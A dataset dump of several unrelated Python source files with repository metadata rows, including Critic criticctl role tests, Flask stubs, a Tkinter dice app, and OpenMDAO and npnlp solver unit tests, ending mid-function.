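    model = LateralInceptionI3d(num_classes=400, final_endpoint='Logits')
    logits, end_points = model(rgb_input, is_training=False,
                               dropout_keep_prob=1.0, channel_mult=1)
    # `logits` has shape [1, 400]; `end_points` holds every intermediate endpoint.
    return logits, end_points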
dba86bdd5c08ab6627ec36aeb7efaeccdb4f421d | 4,019 | py | Python | testing/tests/001-main/001-empty/003-criticctl/002-addrole-delrole.py | darobin/critic | 9d09f3ae45d0b37fb899c5323409c06e8622a2a1 | ["Apache-2.0", "MIT"] | 1 | 2020-12-04T18:43:10.000Z | 2020-12-04T18:43:10.000Z
ROLES = ["administrator", "developer", "newswriter", "repositories"]
# Scenario: Try to add a role that 'admin' already has.
try:
output = instance.execute(
["sudo", "criticctl", "addrole",
"--name", "admin",
"--role", "administrator"])
expected_output = "admin: user already has role 'administrator'"
if expected_output not in output.splitlines():
logger.error("Expected output not found: %r\n%s"
% (expected_output, output))
except testing.virtualbox.GuestCommandError as error:
logger.error("correct criticctl usage failed:\n%s"
% error.stdout)
# Scenario: Try to delete a role 'alice' doesn't have.
try:
output = instance.execute(
["sudo", "criticctl", "delrole",
"--name", "alice",
"--role", "administrator"])
expected_output = "alice: user doesn't have role 'administrator'"
if expected_output not in output.splitlines():
logger.error("Expected output not found: %r\n%s"
% (expected_output, output))
except testing.virtualbox.GuestCommandError as error:
logger.error("correct criticctl usage failed:\n%s"
% error.stdout)
# Scenario: Try to add a role to a non-existing user.
try:
instance.execute(
["sudo", "criticctl", "addrole",
"--name", "nosuchuser",
"--role", "administrator"])
except testing.virtualbox.GuestCommandError as error:
if "nosuchuser: no such user" not in error.stdout.splitlines():
logger.error("criticctl failed with unexpected error message:\n%s"
% error.stdout)
else:
logger.error("incorrect criticctl usage did not fail: "
"addrole, non-existing user")
# Scenario: Try to delete a role from a non-existing user.
try:
instance.execute(
["sudo", "criticctl", "delrole",
"--name", "nosuchuser",
"--role", "administrator"])
except testing.virtualbox.GuestCommandError as error:
if "nosuchuser: no such user" not in error.stdout.splitlines():
logger.error("criticctl failed with unexpected error message:\n%s"
% error.stdout)
else:
logger.error("incorrect criticctl usage did not fail: "
"delrole, non-existing user")
# Scenario: Try to add an invalid role.
try:
instance.execute(
["sudo", "criticctl", "addrole",
"--name", "alice",
"--role", "joker"])
except testing.virtualbox.GuestCommandError as error:
if "invalid choice: 'joker'" not in error.stderr:
logger.error("criticctl failed with unexpected error message:\n%s"
% error.stderr)
else:
logger.error("incorrect criticctl usage did not fail: "
"addrole, invalid role")
# Scenario: Try to delete an invalid role.
try:
instance.execute(
["sudo", "criticctl", "delrole",
"--name", "alice",
"--role", "joker"])
except testing.virtualbox.GuestCommandError as error:
if "invalid choice: 'joker'" not in error.stderr:
logger.error("criticctl failed with unexpected error message:\n%s"
% error.stderr)
else:
logger.error("incorrect criticctl usage did not fail: "
"delrole, invalid role")
# Scenario: Add and then delete each role.
def test_role(role):
try:
instance.execute(
["sudo", "criticctl", "addrole",
"--name", "alice",
"--role", role])
except testing.virtualbox.GuestCommandError as error:
logger.error("correct criticctl usage failed:\n%s"
% error.stdout)
else:
try:
instance.execute(
["sudo", "criticctl", "delrole",
"--name", "alice",
"--role", role])
except testing.virtualbox.GuestCommandError as error:
logger.error("correct criticctl usage failed:\n%s"
% error.stdout)
for role in ROLES:
test_role(role)
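
# --- Hedged refactoring sketch (not part of the original test) ---
# The "run criticctl, then look for an expected line" pattern used above could
# be factored into a single helper. `instance`, `logger` and `testing` are the
# same fixtures this file already relies on.
def expect_output(argv, expected):
    """Runs criticctl via the test instance and checks for an expected line."""
    try:
        output = instance.execute(["sudo", "criticctl"] + argv)
    except testing.virtualbox.GuestCommandError as error:
        logger.error("correct criticctl usage failed:\n%s" % error.stdout)
    else:
        if expected not in output.splitlines():
            logger.error("Expected output not found: %r\n%s"
                         % (expected, output))

# Equivalent to the first scenario above:
# expect_output(["addrole", "--name", "admin", "--role", "administrator"],
#               "admin: user already has role 'administrator'")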
dbcce3e1aaeaa66bf32401b3f405e836f16e51ac | 1,063 | py | Python | web/rest_api/resources/attachment.py | shawnyang610/project-onesteward | 4165379adb9caa7253070251dda85fe96e527642 | ["MIT"]
from flask_restful import Resource, reqparse # noqa
from rest_api.models.attachment import AttachmentModel # noqa
from flask_jwt_extended import jwt_required
# TODO
##############################################
#### Create Attachment ####################
##############################################
class TrackingCreate(Resource):
@jwt_required
def post(self):
pass
##############################################
#### retrieve attachment ####################
##############################################
class TrackingInfo(Resource):
@jwt_required
def post(self):
pass
##############################################
#### update attachment ####################
##############################################
class TrackingUpdate(Resource):
@jwt_required
def put(self):
pass
##############################################
#### delete attachment ####################
##############################################
class TrackingDelete(Resource):
@jwt_required
def delete(self):
pass
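
# --- Hedged wiring sketch (not part of the original module) ---
# Shows how these stub resources might be registered on a flask_restful.Api.
# The URL paths are illustrative assumptions, not routes defined elsewhere in
# the project.
def register_attachment_routes(api):
    """Registers the attachment stubs on a flask_restful.Api instance (sketch)."""
    api.add_resource(TrackingCreate, "/attachment")
    api.add_resource(TrackingInfo, "/attachment/info")
    api.add_resource(TrackingUpdate, "/attachment/update")
    api.add_resource(TrackingDelete, "/attachment/delete")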
dbd36d5cb5030fe5990b642d41393591240d995e | 2,337 | py | Python | Dados Tkinter.py | LucasFerSa/Dado-GUI-Python | 2b0b9d7aac66db9f8c6d40c3bfc23536f20e5975 | ["MIT"]
from tkinter import *
from random import randint
import time
app = Tk()
app.title('Sorteando números')  # title() is a method; assigning to it would shadow it
app.geometry("700x700+350+15")
app.configure(bg = '#1E054D')
def go():
    # Redraw the white board, then draw the pips for a random value from 1 to 6.
    background = Canvas(app, bg='white', height=500, width=500).place(x=100, y=20)
    num = randint(1, 6)
    time.sleep(0.5)  # note: sleeping here briefly freezes the Tk event loop
    if num == 1:
        circle = Canvas(app, bg='black', height=70, width=70).place(x=310, y=230)
    if num == 2:
        circle = Canvas(app, bg='black', height=70, width=70).place(x=120, y=40)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=500, y=430)
    if num == 3:
        circle = Canvas(app, bg='black', height=70, width=70).place(x=120, y=40)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=500, y=430)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=310, y=230)
    if num == 4:
        circle = Canvas(app, bg='black', height=70, width=70).place(x=120, y=40)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=500, y=430)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=500, y=40)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=120, y=430)
    if num == 5:
        circle = Canvas(app, bg='black', height=70, width=70).place(x=120, y=40)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=500, y=430)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=500, y=40)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=120, y=430)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=310, y=230)
    if num == 6:
        circle = Canvas(app, bg='black', height=70, width=70).place(x=120, y=40)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=500, y=430)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=500, y=40)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=120, y=430)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=120, y=230)
        circle = Canvas(app, bg='black', height=70, width=70).place(x=500, y=230)
background = Canvas(app, bg='white', height=500, width=500).place(x=100, y=20)
Sortear = Button(app, bg='#450B45', text='Sort', width=12, height=3, fg='white', font=90, command=go).place(x=285, y=580)
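
# --- Hedged alternative sketch (not part of the original script) ---
# The six if-blocks inside go() can be replaced by a lookup table of pip
# positions, keeping the drawing logic to a single loop. The coordinates
# mirror the ones used above.
PIP_POSITIONS = {
    1: [(310, 230)],
    2: [(120, 40), (500, 430)],
    3: [(120, 40), (500, 430), (310, 230)],
    4: [(120, 40), (500, 430), (500, 40), (120, 430)],
    5: [(120, 40), (500, 430), (500, 40), (120, 430), (310, 230)],
    6: [(120, 40), (500, 430), (500, 40), (120, 430), (120, 230), (500, 230)],
}

def draw_die(value):
    """Clears the board and draws the pips for `value` (illustrative sketch)."""
    Canvas(app, bg='white', height=500, width=500).place(x=100, y=20)
    for x, y in PIP_POSITIONS[value]:
        Canvas(app, bg='black', height=70, width=70).place(x=x, y=y)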
app.mainloop()
91681fcab88aff47044e4d6eeb0bf671245a148c | 102 | py | Python | tests/helper.py | peacemaker07/jawsug_sonic_midnight_jaws | 59aa5b9c3222c76e76e49093555d9f628f9ec225 | ["MIT"] | 1 | 2020-10-03T01:23:39.000Z | 2020-10-03T01:23:39.000Z
import os
def get_abspath():
return os.path.abspath(os.path.dirname(os.path.abspath(__file__)))
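
# --- Hedged usage sketch (not part of the original helper) ---
# A fixture file next to the tests could be located like this; the "data"
# sub-directory and file name in the example are illustrative assumptions.
def fixture_path(*parts):
    """Joins path components onto the tests directory (sketch)."""
    return os.path.join(get_abspath(), *parts)

# Example: fixture_path("data", "example.json")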
918d4e2ff1d66e3446c3ab3aa249312e8f6c8d59 | 19,159 | py | Python | openmdao/solvers/test/test_scipy_gmres.py | naylor-b/OpenMDAO1 | 49d82f6601b33db9bdcf7d146d030d55e3b62ef4 | ["Apache-2.0"] | 17 | 2018-01-11T20:13:59.000Z | 2022-03-22T03:46:05.000Z
""" Unit test for the Scipy GMRES linear solver. """
import unittest
import numpy as np
from openmdao.api import Group, Problem, IndepVarComp, ScipyGMRES, \
DirectSolver, ExecComp, LinearGaussSeidel, AnalysisError
from openmdao.test.converge_diverge import ConvergeDiverge, SingleDiamond, \
ConvergeDivergeGroups, SingleDiamondGrouped
from openmdao.test.sellar import SellarDerivativesGrouped
from openmdao.test.simple_comps import SimpleCompDerivMatVec, FanOut, FanIn, \
FanOutGrouped, DoubleArrayComp, \
FanInGrouped, ArrayComp2D, FanOutAllGrouped
from openmdao.test.util import assert_rel_error
from openmdao.util.options import OptionsDictionary
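
# --- Hedged convenience sketch (not part of the original test module) ---
# The setup that most tests below repeat (wrap a root Group in a Problem,
# attach ScipyGMRES, set up and run) factored into one helper, using only the
# OpenMDAO API imported above.
def _make_gmres_problem(root):
    """Returns a Problem with `root` and a ScipyGMRES linear solver (sketch)."""
    prob = Problem()
    prob.root = root
    prob.root.ln_solver = ScipyGMRES()
    prob.setup(check=False)
    prob.run()
    return prob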
class TestScipyGMRES(unittest.TestCase):
def test_simple_matvec(self):
group = Group()
group.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
group.add('mycomp', SimpleCompDerivMatVec(), promotes=['x', 'y'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
def test_simple_matvec_subbed(self):
group = Group()
group.add('mycomp', SimpleCompDerivMatVec(), promotes=['x', 'y'])
prob = Problem()
prob.root = Group()
prob.root.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
prob.root.add('sub', group, promotes=['*'])
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='fd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
def test_simple_matvec_subbed_like_multipoint(self):
group = Group()
group.add('mycomp', SimpleCompDerivMatVec(), promotes=['x', 'y'])
prob = Problem()
prob.root = Group()
prob.root.add('sub', group, promotes=['*'])
prob.root.sub.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='fd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='fd', return_format='array')
assert_rel_error(self, J[0][0], 2.0, 1e-6)
def test_array2D(self):
group = Group()
group.add('x_param', IndepVarComp('x', np.ones((2, 2))), promotes=['*'])
group.add('mycomp', ArrayComp2D(), promotes=['x', 'y'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
Jbase = prob.root.mycomp._jacobian_cache
diff = np.linalg.norm(J['y']['x'] - Jbase['y', 'x'])
assert_rel_error(self, diff, 0.0, 1e-8)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
diff = np.linalg.norm(J['y']['x'] - Jbase['y', 'x'])
assert_rel_error(self, diff, 0.0, 1e-8)
def test_double_arraycomp(self):
# Mainly testing a bug in the array return for multiple arrays
group = Group()
group.add('x_param1', IndepVarComp('x1', np.ones((2))), promotes=['*'])
group.add('x_param2', IndepVarComp('x2', np.ones((2))), promotes=['*'])
group.add('mycomp', DoubleArrayComp(), promotes=['*'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
Jbase = group.mycomp.JJ
J = prob.calc_gradient(['x1', 'x2'], ['y1', 'y2'], mode='fwd',
return_format='array')
diff = np.linalg.norm(J - Jbase)
assert_rel_error(self, diff, 0.0, 1e-8)
J = prob.calc_gradient(['x1', 'x2'], ['y1', 'y2'], mode='fd',
return_format='array')
diff = np.linalg.norm(J - Jbase)
assert_rel_error(self, diff, 0.0, 1e-8)
J = prob.calc_gradient(['x1', 'x2'], ['y1', 'y2'], mode='rev',
return_format='array')
diff = np.linalg.norm(J - Jbase)
assert_rel_error(self, diff, 0.0, 1e-8)
def test_simple_in_group_matvec(self):
group = Group()
sub = group.add('sub', Group(), promotes=['x', 'y'])
group.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
sub.add('mycomp', SimpleCompDerivMatVec(), promotes=['x', 'y'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
def test_simple_jac(self):
group = Group()
group.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
group.add('mycomp', ExecComp(['y=2.0*x']), promotes=['x', 'y'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
def test_fan_out(self):
prob = Problem()
prob.root = FanOut()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp2.y', "comp3.y"]
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p.x'][0][0], 15.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p.x'][0][0], 15.0, 1e-6)
def test_fan_out_grouped(self):
prob = Problem()
prob.root = FanOutGrouped()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['sub.comp2.y', "sub.comp3.y"]
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['sub.comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['sub.comp3.y']['p.x'][0][0], 15.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['sub.comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['sub.comp3.y']['p.x'][0][0], 15.0, 1e-6)
def test_fan_in(self):
prob = Problem()
prob.root = FanIn()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p1.x1', 'p2.x2']
unknown_list = ['comp3.y']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp3.y']['p1.x1'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p2.x2'][0][0], 35.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp3.y']['p1.x1'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p2.x2'][0][0], 35.0, 1e-6)
def test_fan_in_grouped(self):
prob = Problem()
prob.root = FanInGrouped()
prob.root.ln_solver = ScipyGMRES()
indep_list = ['p1.x1', 'p2.x2']
unknown_list = ['comp3.y']
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp3.y']['p1.x1'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p2.x2'][0][0], 35.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp3.y']['p1.x1'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p2.x2'][0][0], 35.0, 1e-6)
def test_converge_diverge(self):
prob = Problem()
prob.root = ConvergeDiverge()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp7.y1']
prob.run()
# Make sure value is fine.
assert_rel_error(self, prob['comp7.y1'], -102.7, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
def test_analysis_error(self):
prob = Problem()
prob.root = ConvergeDiverge()
prob.root.ln_solver = ScipyGMRES()
prob.root.ln_solver.options['maxiter'] = 2
prob.root.ln_solver.options['err_on_maxiter'] = True
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp7.y1']
prob.run()
# Make sure value is fine.
assert_rel_error(self, prob['comp7.y1'], -102.7, 1e-6)
try:
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
except AnalysisError as err:
self.assertEqual(str(err), "Solve in '': ScipyGMRES failed to converge after 2 iterations")
else:
self.fail("expected AnalysisError")
def test_converge_diverge_groups(self):
prob = Problem()
prob.root = ConvergeDivergeGroups()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
# Make sure value is fine.
assert_rel_error(self, prob['comp7.y1'], -102.7, 1e-6)
indep_list = ['p.x']
unknown_list = ['comp7.y1']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
def test_single_diamond(self):
prob = Problem()
prob.root = SingleDiamond()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp4.y1', 'comp4.y2']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
def test_single_diamond_grouped(self):
prob = Problem()
prob.root = SingleDiamondGrouped()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp4.y1', 'comp4.y2']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
def test_sellar_derivs_grouped(self):
prob = Problem()
prob.root = SellarDerivativesGrouped()
prob.root.mda.nl_solver.options['atol'] = 1e-12
prob.setup(check=False)
prob.run()
# Just make sure we are at the right answer
assert_rel_error(self, prob['y1'], 25.58830273, .00001)
assert_rel_error(self, prob['y2'], 12.05848819, .00001)
indep_list = ['x', 'z']
unknown_list = ['obj', 'con1', 'con2']
Jbase = {}
Jbase['con1'] = {}
Jbase['con1']['x'] = -0.98061433
Jbase['con1']['z'] = np.array([-9.61002285, -0.78449158])
Jbase['con2'] = {}
Jbase['con2']['x'] = 0.09692762
Jbase['con2']['z'] = np.array([1.94989079, 1.0775421 ])
Jbase['obj'] = {}
Jbase['obj']['x'] = 2.98061392
Jbase['obj']['z'] = np.array([9.61001155, 1.78448534])
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
# Cheat a bit so I can twiddle mode
OptionsDictionary.locked = False
prob.root.deriv_options['form'] = 'central'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
class TestScipyGMRESPreconditioner(unittest.TestCase):
def test_sellar_derivs_grouped_precon(self):
prob = Problem()
prob.root = SellarDerivativesGrouped()
prob.root.mda.nl_solver.options['atol'] = 1e-12
prob.root.ln_solver.preconditioner = LinearGaussSeidel()
prob.root.mda.ln_solver = DirectSolver()
prob.setup(check=False)
prob.run()
# Just make sure we are at the right answer
assert_rel_error(self, prob['y1'], 25.58830273, .00001)
assert_rel_error(self, prob['y2'], 12.05848819, .00001)
indep_list = ['x', 'z']
unknown_list = ['obj', 'con1', 'con2']
Jbase = {}
Jbase['con1'] = {}
Jbase['con1']['x'] = -0.98061433
Jbase['con1']['z'] = np.array([-9.61002285, -0.78449158])
Jbase['con2'] = {}
Jbase['con2']['x'] = 0.09692762
Jbase['con2']['z'] = np.array([1.94989079, 1.0775421 ])
Jbase['obj'] = {}
Jbase['obj']['x'] = 2.98061392
Jbase['obj']['z'] = np.array([9.61001155, 1.78448534])
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
def test_converge_diverge_groups(self):
prob = Problem()
prob.root = ConvergeDivergeGroups()
prob.root.ln_solver = ScipyGMRES()
prob.root.ln_solver.preconditioner = LinearGaussSeidel()
prob.root.sub1.ln_solver = DirectSolver()
prob.root.sub3.ln_solver = DirectSolver()
prob.setup(check=False)
prob.run()
# Make sure value is fine.
assert_rel_error(self, prob['comp7.y1'], -102.7, 1e-6)
indep_list = ['p.x']
unknown_list = ['comp7.y1']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
def test_fan_out_all_grouped(self):
prob = Problem()
prob.root = FanOutAllGrouped()
prob.root.ln_solver = ScipyGMRES()
prob.root.ln_solver.preconditioner = LinearGaussSeidel()
prob.root.sub1.ln_solver = DirectSolver()
prob.root.sub2.ln_solver = DirectSolver()
prob.root.sub3.ln_solver = DirectSolver()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['sub2.comp2.y', "sub3.comp3.y"]
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['sub2.comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['sub3.comp3.y']['p.x'][0][0], 15.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['sub2.comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['sub3.comp3.y']['p.x'][0][0], 15.0, 1e-6)
if __name__ == "__main__":
unittest.main()
| 37.788955
| 103
| 0.57717
| 2,702
| 19,159
| 3.932272
| 0.07846
| 0.060141
| 0.093553
| 0.118588
| 0.869929
| 0.847624
| 0.828329
| 0.826824
| 0.817412
| 0.804329
| 0
| 0.058972
| 0.237069
| 19,159
| 506
| 104
| 37.863636
| 0.667921
| 0.016963
| 0
| 0.80274
| 0
| 0
| 0.079118
| 0
| 0
| 0
| 0
| 0
| 0.19726
| 1
| 0.054795
| false
| 0
| 0.021918
| 0
| 0.082192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
918e01176237ccd1cd5e9e77876e6b15d1a0c9e1
| 2,173
|
py
|
Python
|
npnlp/tests/test_sqp.py
|
msparapa/npnlp
|
9158f47def6e6583e662b913ae46be49dafca4f8
|
[
"MIT"
] | null | null | null |
npnlp/tests/test_sqp.py
|
msparapa/npnlp
|
9158f47def6e6583e662b913ae46be49dafca4f8
|
[
"MIT"
] | null | null | null |
npnlp/tests/test_sqp.py
|
msparapa/npnlp
|
9158f47def6e6583e662b913ae46be49dafca4f8
|
[
"MIT"
] | null | null | null |
from npnlp import minimize
import numpy as np

tol = 1e-6


def test_sqp1():
    def J(x):
        return np.array([x[0] ** 4 + x[1] ** 2 - x[0] ** 2 * x[1]])

    x0 = np.array([0.5, 3.0])
    nil = np.array([])

    out = minimize(J, x0, Aeq=np.array([[1,0]]), beq=np.array([1]), method='SQP')

    assert abs(out['x'][0] - 1) < tol
    assert abs(out['x'][1] - 0.5) < tol
    assert abs(out['grad'][0] - 3) < tol
    assert abs(out['grad'][1] - 0) < tol
    assert abs(out['kkt'].equality_linear[0] + 3) < tol


def test_sqp2():
    def J(x):
        return np.array([x[0] ** 4 + x[1] ** 2 - x[0] ** 2 * x[1]])

    x0 = np.array([0.5, 3.0])
    nil = np.array([])

    out = minimize(J, x0, A=np.array([[1,0]]), b=np.array([-1]), method='SQP')

    assert abs(out['x'][0] + 1) < tol
    assert abs(out['x'][1] - 0.5) < tol
    assert abs(out['grad'][0] + 3) < tol
    assert abs(out['grad'][1] - 0) < tol
    assert abs(out['kkt'].inequality_linear[0] - 3) < tol


def test_sqp3():
    def J(x):
        return np.array([x[0] ** 4 + x[1] ** 2 - x[0] ** 2 * x[1]])

    def eq_con(x, kkt):
        return np.array([1 - 2 * x[0] * x[1] / 3, (3 * x[0] ** 2 - 4 * x[1]) / 3 + 1])

    x0 = np.array([0.5, 3.0])
    nil = np.array([])

    out = minimize(J, x0, nonlconeq=eq_con, method='SQP')

    assert abs(out['x'][0] - 1) < tol
    assert abs(out['x'][1] - 1.5) < tol
    assert abs(out['grad'][0] - 1) < tol
    assert abs(out['grad'][1] - 2) < tol
    assert abs(out['kkt'].equality_nonlinear[0] - 2) < tol
    assert abs(out['kkt'].equality_nonlinear[1] - 0.5) < tol


def test_sqp4():
    def J(x):
